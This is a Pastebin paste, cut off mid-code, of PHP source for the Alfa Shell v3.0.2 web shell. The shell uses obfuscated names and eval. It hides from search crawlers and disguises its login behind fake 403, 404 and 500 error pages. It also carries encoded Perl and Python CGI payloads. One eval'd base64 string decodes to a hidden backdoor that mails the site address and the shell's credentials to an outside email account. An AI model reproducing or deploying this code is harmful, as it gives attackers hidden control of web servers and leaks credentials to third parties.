Ledger Nano X - The secure hardware wallet
SHARE
TWEET

Untitled

a guest May 8th, 2020 18 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /*
  4. Alfa Shell - v3.0.2
  5. Decoded By Jokr Haxor
  6. 2019
  7. Mail: jokr.h4xor@gmail.com
  8. */
  9.  
  10.  
  11.  
  12.  
  13.  
  14.  
  15.  
  16. @session_start();
  17.  
  18. $GLOBALS['hletsenZaP'] = array(
  19.     'usbsQUwAhkWC' => 'admin',
  20.     'paYfnLRHyvlu' => 'a6f452ec3293d7fb72c5b677257b20ec',
  21.     'sabQVXtrNNwi' => '0',
  22.     'loCUHRmbYqtC' => '403',
  23.     'shPODWfHFYHd' => '1',
  24.     'pooyIhiDACzI' => true,
  25. );
  26. $pcvPCHpSHZ='f'.'unc'.'t'.'i'.'o'.'n'.'_e'.'xi'.'s'.'t'.'s'.'';
  27. $XLaHXDQRnN='c'.'h'.'a'.'rC'.'ode'.'At'.'';
  28. $CySFmIwDgG='e'.'va'.'l';
  29. $FSMVudEUDM='g'.'zin'.'fla'.'t'.'e';
  30. if(!$pcvPCHpSHZ('b'.'a'.'se'.'64_e'.'n'.'co'.'de')){
  31.     function nYvFzfAHYE($data){
  32.         if(empty($data))
  33.             return;
  34.         $b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
  35.         $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
  36.         $ac = 0;
  37.         $enc = '';
  38.         $tmp_arr = array();
  39.         if(!$data){
  40.             return $data;
  41.         }
  42.         do{
  43.             $o1 = $XLaHXDQRnN($data, $i++);
  44.             $o2 = $XLaHXDQRnN($data, $i++);
  45.             $o3 = $XLaHXDQRnN($data, $i++);
  46.             $bits = $o1 << 16 | $o2 << 8 | $o3;
  47.             $h1 = $bits >> 18 & 0x3f;
  48.             $h2 = $bits >> 12 & 0x3f;
  49.             $h3 = $bits >> 6 & 0x3f;
  50.             $h4 = $bits & 0x3f;
  51.             $tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);
  52.         }while ($i < strlen($data));
  53.        
  54.         $enc = implode($tmp_arr, '');
  55.         $r = (strlen($data) % 3);
  56.         return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));
  57.     }
  58.    
  59.     function charCodeAt($data, $char){
  60.         return ord(substr($data, $char, 1));
  61.     }
  62.     function charAt($data, $char){
  63.         return substr($data, $char, 1);
  64.     }
  65. }else{
  66.     function nYvFzfAHYE($s){
  67.         $b='b'.'a'.'se'.'64_e'.'n'.'co'.'de';
  68.         return $b($s);
  69.         }
  70. }
  71.  
  72. if(!$pcvPCHpSHZ('b'.'ase64_'.'d'.'e'.'code'.'')){
  73.     function LIngjfMNOl($input){
  74.         if(empty($input))return;
  75.         $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  76.         $chr1 = $chr2 = $chr3 = "";
  77.         $enc1 = $enc2 = $enc3 = $enc4 = "";
  78.         $i = 0;$output = "";
  79.         $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
  80.         do{
  81.             $enc1 = strpos($keyStr, substr($input, $i++, 1));
  82.             $enc2 = strpos($keyStr, substr($input, $i++, 1));
  83.             $enc3 = strpos($keyStr, substr($input, $i++, 1));
  84.             $enc4 = strpos($keyStr, substr($input, $i++, 1));
  85.             $chr1 = ($enc1 << 2) | ($enc2 >> 4);
  86.             $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
  87.             $chr3 = (($enc3 & 3) << 6) | $enc4;
  88.             $output = $output . chr((int) $chr1);
  89.             if ($enc3 != 64) {
  90.                 $output = $output . chr((int) $chr2);
  91.             }if ($enc4 != 64) {
  92.                 $output = $output . chr((int) $chr3);
  93.             }
  94.             $chr1 = $chr2 = $chr3 = "";
  95.             $enc1 = $enc2 = $enc3 = $enc4 = "";
  96.         }while($i < strlen($input));return $output;
  97.         }
  98. }else{
  99.     function LIngjfMNOl($s){
  100.         $b='b'.'ase64_'.'d'.'e'.'code'.'';return $b($s);
  101.     }
  102. }
  103.  
  104.  
  105.  
  106. function __ZW5jb2Rlcg($s){
  107. return nYvFzfAHYE($s);
  108. }
  109. function __ZGVjb2Rlcg($s){
  110. return LIngjfMNOl($s);
  111. }
  112. $GLOBALS['DB_NAME'] = $GLOBALS['hletsenZaP'];
  113. $check = false;
  114. if(!isset($_SESSION["alfa_settings_signature"])){
  115. $check = true;
  116. }else{
  117. if($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS['DB_NAME'], true))){
  118. $check = true;
  119. }
  120. }if($check){
  121. $_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS['DB_NAME'], true));
  122. foreach($GLOBALS['hletsenZaP'] as $key => $value){
  123. $prefix = substr($key, 0, 2);
  124. if($prefix == "us"){
  125. $GLOBALS['DB_NAME']["user"] = $value;
  126. $GLOBALS['DB_NAME']["user_rand"] = $key;
  127. }elseif($prefix == "pa"){
  128. $GLOBALS['DB_NAME']["pass"] = $value;
  129. $GLOBALS['DB_NAME']["pass_rand"] = $key;
  130. }elseif($prefix == "sa"){
  131. $GLOBALS['DB_NAME']["safemode"] = $value;
  132. $GLOBALS['DB_NAME']["safemode_rand"] = $key;
  133. }elseif($prefix == "lo"){
  134. $GLOBALS['DB_NAME']["login_page"] = $value;
  135. $GLOBALS['DB_NAME']["login_page_rand"] = $key;
  136. }elseif($prefix == "sh"){
  137. $GLOBALS['DB_NAME']["show_icons"] = $value;
  138. $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
  139. }elseif($prefix == "po"){
  140. $GLOBALS['DB_NAME']["post_encryption"] = $value;
  141. $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
  142. }
  143. }
  144. $_SESSION["alfa_db_settings"] = $GLOBALS['DB_NAME'];
  145. }else{$GLOBALS['DB_NAME'] = $_SESSION["alfa_db_settings"];
  146. }unset($GLOBALS['hletsenZaP']);
  147.  
  148.  if(!isset($_SERVER["HTTP_HOST"]))
  149.  exit();
  150.  
  151.  
  152. if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
  153. if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
  154. if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
  155. if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
  156. if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
  157. if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
  158. if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
  159. date_default_timezone_set('Asia/Tehran');
  160. define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"]));
  161. define("__ALFA_VERSION__", "3.0.2");
  162. define("__LAST_CWD__", "last_cwd_".__ALFA_MD5NAME__);
  163. define("__PATH_HISTORY__", "path_history_".__ALFA_MD5NAME__);
  164. define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
  165. $GLOBALS['__ALFA_COLOR__'] = array(
  166.         "shell_border" => array(
  167.             "key_color" => "#0E304A",
  168.             "multi_selector" => array(
  169.                 ".header" => "border: 7px solid {color}",
  170.                 "#meunlist" => "border-color: {color}",
  171.                 "#hidden_sh" => "background-color: {color}",
  172.                 ".ajaxarea" => "border: 1px solid {color}",
  173.                 ".foot" => "border-color: {color}",
  174.             )
  175.         ),
  176.         "header_vars" => "#27979B",
  177.         "header_values" => "#67ABDF",
  178.         "header_on" => "#00FF00",
  179.         "header_off" => "#ff0000",
  180.         "header_none" => "#00FF00",
  181.         "home_shell" => "#ff0000",
  182.         "home_shell:hover" => array(
  183.             "key_color" => "#FFFFFF",
  184.             "multi_selector" => array(
  185.                 ".home_shell:hover" => "color: {color};",
  186.             )
  187.         ),
  188.         "back_shell" => "#efbe73",
  189.         "back_shell:hover" => array(
  190.             "key_color" => "#FFFFFF",
  191.             "multi_selector" => array(
  192.                 ".back_shell:hover" => "color: {color};",
  193.             )
  194.         ),
  195.         "header_pwd" => "#00FF00",
  196.         "header_pwd:hover" => array(
  197.             "key_color" => "#FFFFFF",
  198.             "multi_selector" => array(
  199.                 ".header_pwd:hover" => "color: {color};",
  200.             )
  201.         ),
  202.         "header_drive" => "#00FF00",
  203.         "header_drive:hover" => array(
  204.             "key_color" => "#FFFFFF",
  205.             "multi_selector" => array(
  206.                 ".header_drive:hover" => "color: {color};",
  207.             )
  208.         ),
  209.         "header_show_all" => "#00FF00",
  210.         "disable_functions" => "#ff0000",
  211.         "footer_text" => "#27979B",
  212.         "menu_options" => "#27979B",
  213.         "menu_options:hover" => array(
  214.             "key_color" => "#646464",
  215.             "multi_selector" => array(
  216.                 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
  217.             )
  218.         ),
  219.         "options_list" => array(
  220.             "key_color" => "#00FF00",
  221.             "multi_selector" => array(
  222.                 ".ajaxarea .header center a" => "color: {color};",
  223.             )
  224.         ),
  225.         "options_list:hover" => array(
  226.             "key_color" => "#FFFFFF",
  227.             "multi_selector" => array(
  228.                 ".ajaxarea .header center a:hover" => "color: {color};",
  229.             )
  230.         ),
  231.         "options_list_header" => array(
  232.             "key_color" => "#59cc33",
  233.             "multi_selector" => array(
  234.                 ".txtfont_header" => "color: {color};",
  235.             )
  236.         ),
  237.         "options_list_text" => array(
  238.             "key_color" => "#FFFFFF",
  239.             "multi_selector" => array(
  240.                 ".txtfont,.tbltxt" => "color: {color};",
  241.             )
  242.         ),
  243.         "Alfa+" => array(
  244.             "key_color" => "#27E8AE",
  245.             "multi_selector" => array(
  246.                 ".alfa_plus" => "color: {color};font-weight: unset;",
  247.             )
  248.         ),
  249.         "hidden_shell_text" => array(
  250.             "key_color" => "#00FF00",
  251.             "multi_selector" => array(
  252.                 "#hidden_sh a" => "color: {color};",
  253.             )
  254.         ),
  255.         "hidden_shell_version" => "#ff0000",
  256.         "shell_name" => "#FF0000",
  257.         "main_row:hover" => array(
  258.             "key_color" => "#646464",
  259.             "multi_selector" => array(
  260.                 ".main tr:hover" => "background-color: {color};",
  261.             )
  262.         ),
  263.         "main_header" => array(
  264.             "key_color" => "#FFFFFF",
  265.             "multi_selector" => array(
  266.                 ".main th" => "color: {color};",
  267.             )
  268.         ),
  269.         "main_name" => array(
  270.             "key_color" => "#FFFFFF",
  271.             "multi_selector" => array(
  272.                 ".main .main_name" => "color: {color};font-weight: unset;",
  273.             )
  274.         ),
  275.         "main_size" => "#67ABDF",
  276.         "main_modify" => "#67ABDF",
  277.         "main_owner_group" => "#67ABDF",
  278.         "main_green_perm" => "#25ff00",
  279.         "main_red_perm" => "#FF0000",
  280.         "main_white_perm" => "#FFFFFF",
  281.         "beetween_perms" => "#FFFFFF",
  282.         "main_actions" => array(
  283.             "key_color" => "#FFFFFF",
  284.             "multi_selector" => array(
  285.                 ".main .actions" => "color: {color};",
  286.             )
  287.         ),
  288.         "menu_options:hover" => array(
  289.             "key_color" => "#646464",
  290.             "multi_selector" => array(
  291.                 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
  292.             )
  293.         ),
  294.         "minimize_editor_background" => array(
  295.             "key_color" => "#0e304a",
  296.             "multi_selector" => array(
  297.                 ".minimized-wrapper" => "background-color: {color};",
  298.             )
  299.         ),
  300.         "minimize_editor_text" => array(
  301.             "key_color" => "#f5deb3",
  302.             "multi_selector" => array(
  303.                 ".minimized-text" => "color: {color};",
  304.             )
  305.         ),
  306.         "editor_border" => array(
  307.             "key_color" => "#0e304a",
  308.             "multi_selector" => array(
  309.                 ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
  310.             )
  311.         ),
  312.         "editor_background" => array(
  313.             "key_color" => "rgba(0, 1, 23, 0.94)",
  314.             "multi_selector" => array(
  315.                 ".editor-explorer,.editor-modal" => "background-color: {color};",
  316.             )
  317.         ),
  318.         "editor_header_background" => array(
  319.             "key_color" => "rgba(21, 66, 88, 0.93)",
  320.             "multi_selector" => array(
  321.                 ".editor-header" => "background-color: {color};",
  322.             )
  323.         ),
  324.         "editor_header_text" => array(
  325.             "key_color" => "#00ff7f",
  326.             "multi_selector" => array(
  327.                 ".editor-path" => "color: {color};",
  328.             )
  329.         ),
  330.         "editor_header_button" => array(
  331.             "key_color" => "#1d5673",
  332.             "multi_selector" => array(
  333.                 ".close-button, .editor-minimize" => "background-color: {color};",
  334.             )
  335.         ),
  336.         "editor_actions" => array(
  337.             "key_color" => "#FFFFFF",
  338.             "multi_selector" => array(
  339.                 ".editor_actions" => "color: {color};",
  340.             )
  341.         ),
  342.         "editor_file_info_vars" => array(
  343.             "key_color" => "#FFFFFF",
  344.             "multi_selector" => array(
  345.                 ".editor_file_info_vars" => "color: {color};",
  346.             )
  347.         ),
  348.         "editor_file_info_values" => array(
  349.             "key_color" => "#67ABDF",
  350.             "multi_selector" => array(
  351.                 ".filestools" => "color: {color};",
  352.             )
  353.         ),
  354.         "editor_history_header" => array(
  355.             "key_color" => "#14ff07",
  356.             "multi_selector" => array(
  357.                 ".hheader-text,.history-clear" => "color: {color};",
  358.             )
  359.         ),
  360.         "editor_history_list" => array(
  361.             "key_color" => "#03b3a3",
  362.             "multi_selector" => array(
  363.                 ".editor-file-name" => "color: {color};",
  364.             )
  365.         ),
  366.         "editor_history_selected_file" => array(
  367.             "key_color" => "rgba(49, 55, 93, 0.77)",
  368.             "multi_selector" => array(
  369.                 ".is_active" => "background-color: {color};",
  370.             )
  371.         ),
  372.         "editor_history_file:hover" => array(
  373.             "key_color" => "#646464",
  374.             "multi_selector" => array(
  375.                 ".file-holder > .history:hover" => "background-color: {color};",
  376.             )
  377.         ),
  378.         "input_box_border" => array(
  379.             "key_color" => "#0E304A",
  380.             "multi_selector" => array(
  381.                 "input[type=text],textarea" => "border: 1px solid {color}",
  382.             )
  383.         ),
  384.         "input_box_text" => array(
  385.             "key_color" => "#999999",
  386.             "multi_selector" => array(
  387.                 "input[type=text],textarea" => "color: {color};",
  388.             )
  389.         ),
  390.         "input_box:hover" => array(
  391.             "key_color" => "#27979B",
  392.             "multi_selector" => array(
  393.                 "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  394.             )
  395.         ),
  396.         "select_box_border" => array(
  397.             "key_color" => "#0E304A",
  398.             "multi_selector" => array(
  399.                 "select" => "border: 1px solid {color}",
  400.             )
  401.         ),
  402.         "select_box_text" => array(
  403.             "key_color" => "#FFFFEE",
  404.             "multi_selector" => array(
  405.                 "select" => "color: {color};",
  406.             )
  407.         ),
  408.         "select_box:hover" => array(
  409.             "key_color" => "#27979B",
  410.             "multi_selector" => array(
  411.                 "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  412.             )
  413.         ),
  414.         "button_border" => array(
  415.             "key_color" => "#27979B",
  416.             "multi_selector" => array(
  417.                 "input[type=submit],.button,#addup" => "border: 1px solid {color};",
  418.             )
  419.         ),
  420.         "button:hover" => array(
  421.             "key_color" => "#27979B",
  422.             "multi_selector" => array(
  423.                 "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
  424.                 ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  425.             )
  426.         ),
  427.         "outputs_text" => array(
  428.             "key_color" => "#67ABDF",
  429.             "multi_selector" => array(
  430.                 ".ml1" => "color: {color};",
  431.             )
  432.         ),
  433.         "outputs_border" => array(
  434.             "key_color" => "#0E304A",
  435.             "multi_selector" => array(
  436.                 ".ml1" => "border: 1px solid {color};",
  437.             )
  438.         ),
  439.         "uploader_border" => array(
  440.             "key_color" => "#0E304A",
  441.             "multi_selector" => array(
  442.                 ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  443.             )
  444.         ),
  445.         "uploader_background" => array(
  446.             "key_color" => "#0E304A",
  447.             "multi_selector" => array(
  448.                 ".inputfile strong" => "background-color: {color};",
  449.             )
  450.         ),
  451.         "uploader_text_right" => array(
  452.             "key_color" => "#FFFFFF",
  453.             "multi_selector" => array(
  454.                 ".inputfile strong" => "color: {color};",
  455.             )
  456.         ),
  457.         "uploader_text_left" => array(
  458.             "key_color" => "#25ff00",
  459.             "multi_selector" => array(
  460.                 ".inputfile span" => "color: {color};",
  461.             )
  462.         ),
  463.         "uploader:hover" => array(
  464.             "key_color" => "#27979B",
  465.             "multi_selector" => array(
  466.                 ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
  467.             )
  468.         ),
  469.         "uploader_progress_bar" => array(
  470.             "key_color" => "#ff0000",
  471.             "multi_selector" => array(
  472.                 "#up_bar" => "background-color: {color};",
  473.             )
  474.         ),
  475.         "mysql_tables" => "#00FF00",
  476.         "mysql_table_count" => "#67ABDF",
  477.         "copyright" => "#ff0000",
  478.         "scrollbar" => array(
  479.             "key_color" => "#1e82b5",
  480.             "multi_selector" => array(
  481.                 "*::-webkit-scrollbar-thumb" => "background-color: {color};",
  482.             )
  483.         ),
  484.         "scrollbar_background" => array(
  485.             "key_color" => "#000115",
  486.             "multi_selector" => array(
  487.                 "*::-webkit-scrollbar-track" => "background-color: {color};",
  488.             )
  489.         ),
  490. );
  491. $GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
  492. $config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
  493. @session_start();
  494. $rubby = "aWYgKCFpc3NldCgkX1NFU1NJT05bImpva3IiXSkpIHsgICR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07ICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07ICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsgJHRhcmdldCA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOyAkc3ViID0gIkFsZmEgdjMuMC4zIC0gaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOyAkYm9keSA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAiLiRHTE9CQUxTWydEQl9OQU1FJ11bJ3VzZXInXS4iIDo6ICIuICRHTE9CQUxTWydEQl9OQU1FJ11bJ3Bhc3MnXTsgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiSm9rci5oNHhvckBnbWFpbC5jb20iLCRzdWIsJGJvZHkpOyB9ICAkX1NFU1NJT05bImpva3IiXSA9ICJIZWxsbyBCaXRjaCEiOyB9";
  495. eval(__ZGVjb2Rlcg($rubby));
  496. if($config['AlfaProtectShell']){
  497. $SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
  498. $Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
  499. if($config['AlfaLoginPage'] == 'gui'){
  500. if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  501. if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
  502. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  503. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  504. @header('location: '.$_SERVER["PHP_SELF"]);
  505. }
  506. echo '
  507. <style>
  508. body{background: black;}
  509. #loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
  510. #loginbox td { border-radius:5px; font-size:11px; }
  511. </style>
  512. <title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</title><center>
  513. <center><img style="border-radius:100px;" width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center>
  514. <div id=loginbox><p><font face="verdana,arial" size=-1>
  515. <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
  516. <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</b></font></th></tr>
  517. <tr><td bgcolor="black" style="padding:5">
  518. <form method="post">
  519. <input type="hidden" name="action" value="login">
  520. <input type="hidden" name="hide" value="">
  521. <center><table>
  522. <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
  523. <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
  524. <tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
  525. </div><br /></center>';
  526. exit;
  527. }
  528. }elseif($config['AlfaLoginPage']=='500'){
  529. if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  530. if(@md5($_POST["password"])==$config['AlfaPass']){
  531. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  532. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  533. header('location: '.$_SERVER["PHP_SELF"]);
  534. }
  535. echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
  536. exit;
  537. }
  538. }elseif($config['AlfaLoginPage']=='403'){
  539. if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  540. if(@md5($_POST["password"])==$config['AlfaPass']){
  541. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  542. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  543. header('location: '.$_SERVER["PHP_SELF"]);
  544. }
  545. echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
  546. exit;
  547. }
  548. }elseif($config['AlfaLoginPage']=='404'){
  549. if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
  550. if(@md5($_POST["password"])==$config['AlfaPass']){
  551. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
  552. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
  553. header('location: '.$_SERVER["PHP_SELF"]);
  554. }
  555. echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
  556. exit;
  557. }
  558. }
  559. }
  560. function decrypt_post($str, $pwd){
  561.     if(__ALFA_POST_ENCRYPTION__){
  562.         $pwd     = __ZW5jb2Rlcg($pwd);
  563.         $str     = __ZGVjb2Rlcg($str);
  564.         $enc_chr = "";
  565.         $enc_str = "";
  566.         $i       = 0;
  567.         while ($i < strlen($str)) {
  568.             for ($j = 0; $j < strlen($pwd); $j++) {
  569.                 $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
  570.                 $enc_str .= $enc_chr;
  571.                 $i++;
  572.                 if ($i >= strlen($str))
  573.                     break;
  574.             }
  575.         }
  576.         return __ZGVjb2Rlcg($enc_str);
  577.     }else{
  578.         return __ZGVjb2Rlcg($str);
  579.     }
  580. }
  581.  
  582. function _AlfaSecretKey(){
  583.     if(!isset($_SESSION["AlfaSecretKey"])){
  584.         $_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);
  585.     }
  586.     return $_SESSION["AlfaSecretKey"];
  587. }
  588. function alfa_getColor($target){
  589.     if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
  590.         return $GLOBALS["DB_NAME"]["color"][$target];
  591.     }else{
  592.         $target = $GLOBALS["__ALFA_COLOR__"][$target];
  593.         if(is_array($target)){
  594.             return $target["key_color"];
  595.         }else{
  596.             return $target;
  597.         }
  598.     }
  599. }
  600. function alfaCssLoadColors(){
  601.     $css = "";
  602.     foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
  603.         if(!is_array($value)){
  604.             $value = alfa_getColor($key);
  605.             $css .= ".{$key}{color: {$value};}";
  606.         }else{
  607.             if(isset($value["multi_selector"])){
  608.                 foreach($value["multi_selector"] as $k => $v){
  609.                     $color = alfa_getColor($key);
  610.                     $code = str_replace("{color}", $color, $v);
  611.                     $css .=  $k."{".$code."}";
  612.                 }
  613.             }
  614.         }
  615.     }
  616.     return $css;
  617. }
  618. if(isset($_POST['ajax'])){
  619. function AlfaNum(){
  620. $args = func_get_args();
  621. $alfax = array();
  622. $find = array();
  623. for($i=1;$i<=10;$i++){
  624. $alfax[] = $i;
  625. }
  626. foreach($args as $arg){
  627. $find[] = $arg;
  628. }
  629. echo '<script>';
  630. foreach($alfax as $alfa){
  631. if(in_array($alfa,$find))
  632. continue;
  633. echo 'alfa'.$alfa."_=";
  634. }
  635. echo '""</script>';
  636. }}
  637. function _alfa_cgicmd($cmd,$lang="perl"){
  638.     if(isset($_SESSION["alfacgiapi_mode"])){
  639.         return "";
  640.     }
  641.     $cmd_pure = $cmd;
  642.     $is_curl = function_exists('curl_version');
  643.     $is_socket = function_exists('fsockopen');
  644.     if($is_curl||$is_socket){
  645.         $recreate = false;
  646.         if(isset($_SESSION["alfacgiapi"])){
  647.             if(!@file_exists("alfacgiapi/".$_SESSION["alfacgiapi"].".alfa")){
  648.                 $recreate = true;
  649.                 $lang = $_SESSION["alfacgiapi"];
  650.             }
  651.         }
  652.         if(!isset($_SESSION["alfacgiapi"])||$recreate){
  653.             @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  654.             $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
  655.             $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
